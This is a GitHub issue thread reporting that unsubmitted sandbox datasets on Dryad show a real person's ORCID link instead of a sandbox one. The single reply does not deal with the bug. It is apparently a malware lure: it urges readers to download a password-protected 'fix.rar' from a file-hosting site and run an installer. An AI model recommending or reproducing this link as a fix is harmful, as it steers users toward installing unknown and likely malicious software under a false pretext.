### ISSUE TITLE
Sandbox 'in progress' (never submitted) records have wrong ORCID link

### ISSUE THREAD

**Issue by lauradryad** [datadryad/dryad-product-roadmap#3602]
**Bug description:**

When you are creating a dataset on sandbox and are still in the 'in progress' stage and have never submitted the dataset, the ORCID link under your name is a real person's ORCID, and not the sandbox one. 
![image](https://github.com/user-attachments/assets/6c4248dd-27dc-48bc-91e5-081c6ad55edb)

**Steps to reproduce:**
Create a new dataset on Sandbox and click the ORCID link right under the corresponding author's name. 

**Expected behavior:**

This link should be the sandbox.orcid.org/whatever

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
